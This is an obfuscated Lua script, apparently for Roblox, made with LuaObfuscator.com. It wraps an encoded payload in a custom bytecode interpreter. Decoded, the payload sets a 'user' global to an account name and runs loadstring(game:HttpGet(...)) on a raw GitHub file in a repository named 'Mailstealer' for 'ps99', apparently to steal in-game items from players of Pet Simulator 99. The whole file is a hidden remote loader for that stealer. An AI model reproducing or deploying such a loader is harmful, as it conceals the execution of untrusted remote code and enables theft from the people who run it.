--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.19) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==1) then v21=nil;function v21(v31,v32,v33)if v33 then local v84=(v31/((929 -(214 + 713))^(v32-(2 -1))))%((5 -(1 + 2))^(((v33-(878 -(282 + 595))) -(v32-(1 -0))) + 1 + 0)) ;return v84-(v84%(2 -1)) ;else local v85=619 -(555 + (1021 -(892 + 65))) ;local v86;while true do if (v85==((3029 -1759) -(226 + 1044))) then v86=(3 -1)^(v32-(932 -(857 + 74))) ;return (((v31%(v86 + v86))>=v86) and ((1043 -474) -(367 + 201))) or (0 + 0) ;end end end end v22=nil;v18=2;end if (v18==3) then v24=nil;function v24()local v34=(255 + 95) -(87 + 263) ;local v35;local v36;local v37;local v38;while true do if (v34==(181 -(67 + 113))) then return (v38 * (12302277 + 4474939)) + (v37 * (160901 -95365)) + (v36 * (189 + 67)) + v35 ;end if ((0 -0)==v34) then v35,v36,v37,v38=v1(v16,v19,v19 + (955 -(802 + 150)) );v19=v19 + (10 -6) ;v34=1 -(997 -(915 + 82)) ;end end end v25=nil;v18=4;end if (v18==6) then v29=nil;function v29()local v39=392 -(232 + 160) ;local v40;local v41;local v42;local v43;local v44;local v45;local v46;while true do if (v39~=(1 -0)) then else v42=nil;v43=nil;v39=1279 -(37 + 1240) ;end if (0==v39) then v40=0;v41=nil;v39=1;end if ((7 -5)==v39) then v44=nil;v45=nil;v39=3;end if (v39~=3) then else v46=nil;while true do local v92=0 -0 ;while true do if (1==v92) then if (v40==1) then local v102=0 -0 ;while true do if (v102==(1 + 0)) then v46={};v40=2;break;end if ((0 -0)~=v102) then else v44={v41,v42,nil,v43};v45=v24();v102=1;end end end if ((971 -(140 + 831))==v40) then local v103=0;while true do if (v103==(1850 -(1409 + 441))) then v41={};v42={};v103=1;end if (v103==1) then v43={};v40=719 -(15 + 703) ;break;end end end break;end if (v92==(0 + 0)) then if ((441 -(262 + 176))==v40) then local v104=0;while true do if (v104==0) then for v120=1,v24() do v42[v120-1 ]=v29();end return v44;end end end if (v40~=(1723 -(345 + 1376))) then else local v105=0;while true do if ((688 -(198 + 490))~=v105) then else for v122=4 -3 ,v45 do local v123=0 -0 ;local v124;local v125;local v126;while true do if (v123==(1206 -(696 + 510))) then v124=0;v125=nil;v123=1 -0 ;end if (v123==(1263 -(1091 + 171))) then v126=nil;while true do if (v124==(0 + 0)) then local v183=0 -0 ;while true do if (v183~=(3 -2)) then else v124=1;break;end if (0==v183) then v125=v22();v126=nil;v183=1;end end end if (v124==1) then if (v125==1) then v126=v22()~=(374 -(123 + 251)) ;elseif (v125==2) then v126=v25();elseif (v125==(14 -11)) then v126=v26();end v46[v122]=v126;break;end end break;end end end v44[701 -(208 + 490) ]=v22();v105=1;end if (v105==1) then for v127=1 + 0 ,v24() do local v128=0 + 0 ;local v129;local v130;local v131;while true do if (v128==(836 -(660 + 176))) then v129=0 + 0 ;v130=nil;v128=1;end if (v128~=(203 -(14 + 188))) then else v131=nil;while true do if (v129~=(676 -(534 + 141))) then else while true do if (v130~=0) then else v131=v22();if (v21(v131,1,1)~=0) then else local v185=0 + 0 ;local v186;local v187;local v188;local v189;while true do if (v185==0) then v186=0;v187=nil;v185=1;end if (v185~=2) then else while true do if (v186==3) then if (v21(v188,3,3)~=(1 + 0)) then else v189[4]=v46[v189[4 + 0 ]];end v41[v127]=v189;break;end if (v186==0) then local v191=0 -0 ;while true do if (v191==0) then local v197=0 -0 ;while true do if (v197~=(0 -0)) then else v187=v21(v131,2,3);v188=v21(v131,3 + 1 ,6);v197=1;end if (v197~=(1 + 0)) then else v191=1;break;end end end if (v191==(397 -(115 + 281))) then v186=2 -1 ;break;end end end if (v186==2) then local v192=0;while true do if (v192==(0 + 0)) then if (v21(v188,1,2 -1 )==(3 -2)) then v189[869 -(550 + 317) ]=v46[v189[2 -0 ]];end if (v21(v188,2 -0 ,5 -3 )~=(286 -(134 + 151))) then else v189[1668 -(970 + 695) ]=v46[v189[3]];end v192=1;end if ((1 -0)~=v192) then else v186=3;break;end end end if (v186==1) then v189={v23(),v23(),nil,nil};if (v187==(0 -0)) then local v195=0;local v196;while true do if (v195==(0 -0)) then v196=0;while true do if (v196==0) then v189[3]=v23();v189[4]=v23();break;end end break;end end elseif (v187==1) then v189[11 -8 ]=v24();elseif (v187==2) then v189[1827 -(1195 + 629) ]=v24() -(2^16) ;elseif (v187==(3 -0)) then local v206=241 -(187 + 54) ;local v207;while true do if (v206~=0) then else v207=0;while true do if (v207==(780 -(162 + 618))) then v189[3]=v24() -((2 + 0)^16) ;v189[4]=v23();break;end end break;end end end v186=2;end end break;end if (v185==1) then v188=nil;v189=nil;v185=2;end end end break;end end break;end if (v129~=0) then else v130=0;v131=nil;v129=1 + 0 ;end end break;end end end v40=3;break;end end end v92=1 -0 ;end end end break;end end end v30=nil;v18=7;end if (v18==4) then function v25()local v47=0 -0 ;local v48;local v49;local v50;local v51;local v52;local v53;while true do if (v47==(0 + 0)) then v48=v24();v49=v24();v47=1637 -(1373 + 263) ;end if (v47==2) then v52=v21(v49,1021 -(451 + 549) ,4 + 27 );v53=((v21(v49,11 + 21 )==(1457 -(282 + 1174))) and  -((84 + 728) -(569 + 242))) or 1 ;v47=4 -(1 + 0) ;end if (v47==(1 -0)) then v50=1385 -(746 + 638) ;v51=(v21(v49,1025 -(706 + 318) ,1271 -(721 + 530) ) * ((1 + 1 + 0)^((608 -(406 + 123)) -(1816 -(1749 + 20))))) + v48 ;v47=2 -0 ;end if (v47==(344 -(218 + 123))) then if (v52==(0 + 0 + 0)) then if (v51==(1581 -(1535 + (1368 -(1249 + 73))))) then return v53 * (0 + 0) ;else v52=1 + 0 + 0 ;v50=560 -(306 + 254) ;end elseif (v52==(127 + 1920)) then return ((v51==0) and (v53 * ((1 -0)/((1145 -(466 + 679)) + (0 -0))))) or (v53 * NaN) ;end return v8(v53,v52-(2490 -(899 + (1624 -1056))) ) * (v50 + (v51/((2 + 0)^(125 -73)))) ;end end end v26=nil;function v26(v54)local v55=1900 -(106 + 1794) ;local v56;local v57;while true do if (v55==(1 + 1)) then v57={};for v93=1 + 0 , #v56 do v57[v93]=v2(v1(v3(v56,v93,v93)));end v55=8 -5 ;end if (v55==(0 -0)) then v56=nil;if  not v54 then v54=v24();if (v54==(114 -(4 + 110))) then return "";end end v55=585 -(57 + 527) ;end if (v55==(1430 -(41 + 1386))) then return v6(v57);end if (v55==(104 -(17 + 86))) then v56=v3(v16,v19,(v19 + v54) -(1 + (0 -0)) );v19=v19 + v54 ;v55=(169 -(122 + 44)) -1 ;end end end v18=5;end if (v18==2) then function v22()local v58=(65 -(30 + 35)) -0 ;local v59;while true do if (v58==(3 -2)) then return v59;end if (v58==(0 + 0 + 0)) then v59=v1(v16,v19,v19);v19=v19 + 1 + 0 ;v58=1 -(1257 -(1043 + 214)) ;end end end v23=nil;function v23()local v60=0;local v61;local v62;while true do if (v60==(0 -(0 + 0))) then v61,v62=v1(v16,v19,v19 + 2 );v19=v19 + (1214 -(323 + 889)) ;v60=2 -1 ;end if (v60==((994 -(15 + 398)) -(361 + 219))) then return (v62 * (576 -(53 + 267))) + v61 ;end end end v18=3;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v63)if (v1(v63,2)==79) then local v87=0;while true do if (v87==0) then v20=v0(v3(v63,1,1));return "";end end else local v88=0;local v89;while true do if (v88==0) then v89=v2(v0(v63,16));if v20 then local v101=v5(v89,v20);v20=nil;return v101;else return v89;end break;end end end end);v18=1;end if (v18==7) then function v30(v64,v65,v66)local v67=v64[1];local v68=v64[2];local v69=v64[3];return function(...)local v70=v67;local v71=v68;local v72=v69;local v73=v28;local v74=1;local v75= -1;local v76={};local v77={...};local v78=v12("#",...) -1 ;local v79={};local v80={};for v90=0,v78 do if (v90>=v72) then v76[v90-v72 ]=v77[v90 + 1 ];else v80[v90]=v77[v90 + 1 ];end end local v81=(v78-v72) + 1 ;local v82;local v83;while true do local v91=0;while true do if (v91==1) then if (v83<=5) then if (v83<=2) then if (v83<=0) then local v106=0;local v107;local v108;local v109;local v110;local v111;while true do if (v106==3) then v82=v70[v74];v80[v82[2]]=v82[3];v74=v74 + 1 ;v82=v70[v74];v80[v82[2]]=v82[3]~=0 ;v74=v74 + 1 ;v106=4;end if (v106==0) then v107=nil;v108,v109=nil;v110=nil;v111=nil;v66[v82[3]]=v80[v82[2]];v74=v74 + 1 ;v106=1;end if (v106==4) then v82=v70[v74];v111=v82[2];v108,v109=v73(v80[v111](v13(v80,v111 + 1 ,v82[3])));v75=(v109 + v111) -1 ;v107=0;for v163=v111,v75 do v107=v107 + 1 ;v80[v163]=v108[v107];end v106=5;end if (6==v106) then v80[v82[2]]();v74=v74 + 1 ;v82=v70[v74];v74=v82[3];break;end if (v106==2) then v82=v70[v74];v111=v82[2];v110=v80[v82[3]];v80[v111 + 1 ]=v110;v80[v111]=v110[v82[4]];v74=v74 + 1 ;v106=3;end if (v106==5) then v74=v74 + 1 ;v82=v70[v74];v111=v82[2];v80[v111]=v80[v111](v13(v80,v111 + 1 ,v75));v74=v74 + 1 ;v82=v70[v74];v106=6;end if (v106==1) then v82=v70[v74];if ((v82[3]=="_ENV") or (v82[3]=="getfenv")) then v80[v82[2]]=v66;else v80[v82[2]]=v66[v82[3]];end v74=v74 + 1 ;v82=v70[v74];if ((v82[3]=="_ENV") or (v82[3]=="getfenv")) then v80[v82[2]]=v66;else v80[v82[2]]=v66[v82[3]];end v74=v74 + 1 ;v106=2;end end elseif (v83>1) then local v132=v82[2];v80[v132]=v80[v132](v13(v80,v132 + 1 ,v75));else v66[v82[3]]=v80[v82[2]];end elseif (v83<=3) then v74=v82[3];elseif (v83>4) then if (v80[v82[2]]==v82[4]) then v74=v74 + 1 ;else v74=v82[3];end else v80[v82[2]]=v82[3]~=0 ;end elseif (v83<=8) then if (v83<=6) then local v113=v82[2];local v114,v115=v73(v80[v113](v13(v80,v113 + 1 ,v82[3])));v75=(v115 + v113) -1 ;local v116=0;for v118=v113,v75 do local v119=0;while true do if (v119==0) then v116=v116 + 1 ;v80[v118]=v114[v116];break;end end end elseif (v83==7) then v80[v82[2]]=v82[3];else do return;end end elseif (v83<=10) then if (v83>9) then local v139=0;local v140;local v141;while true do if (v139==1) then v80[v140 + 1 ]=v141;v80[v140]=v141[v82[4]];break;end if (v139==0) then v140=v82[2];v141=v80[v82[3]];v139=1;end end else v80[v82[2]]();end elseif (v83>11) then for v161=v82[2],v82[3] do v80[v161]=nil;end elseif ((v82[3]=="_ENV") or (v82[3]=="getfenv")) then v80[v82[2]]=v66;else v80[v82[2]]=v66[v82[3]];end v74=v74 + 1 ;break;end if (v91==0) then v82=v70[v74];v83=v82[1];v91=1;end end end end;end return v30(v29(),{},v17)(...);end end end v15("LOL!073O00028O0003043O0075736572030B3O006B616C69626O31030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403453O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F6D2O61726C2O6F77312F4D61696C737465616C65722F6D61696E2F70732O392E74787400163O0012073O00014O000C000100013O0026053O0002000100010004033O00020001001207000100013O00260500010005000100010004033O00050001001207000200033O00122O000200023O00122O000200043O00122O000300053O00202O00030003000600122O000500076O000600016O000300066O00023O00024O00020001000100044O001500010004033O000500010004033O001500010004033O000200012O00083O00017O00",v9(),...);